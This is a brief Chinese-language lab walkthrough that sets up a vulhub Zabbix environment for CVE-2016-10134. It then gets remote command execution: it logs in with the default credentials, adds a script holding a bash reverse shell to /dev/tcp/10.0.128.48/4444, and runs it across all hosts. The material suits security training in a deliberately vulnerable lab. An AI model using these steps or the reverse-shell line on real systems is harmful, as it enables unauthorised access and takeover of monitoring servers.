vulhub有现成的zabbix环境
git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
cd vulhub/zabbix/CVE-2016-10134/
docker-compose up -d
zabbix默认口令admin\zabbix
1.写脚本
http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4
bash -i>& /dev/tcp/10.0.128.48/4444 0>&1
2.执行脚本
http://x.x.x.x/zabbix/latest.php?ddreset=1,点击Host groups的select,全选,本地监听端口然后选择脚本执行
3.shell反弹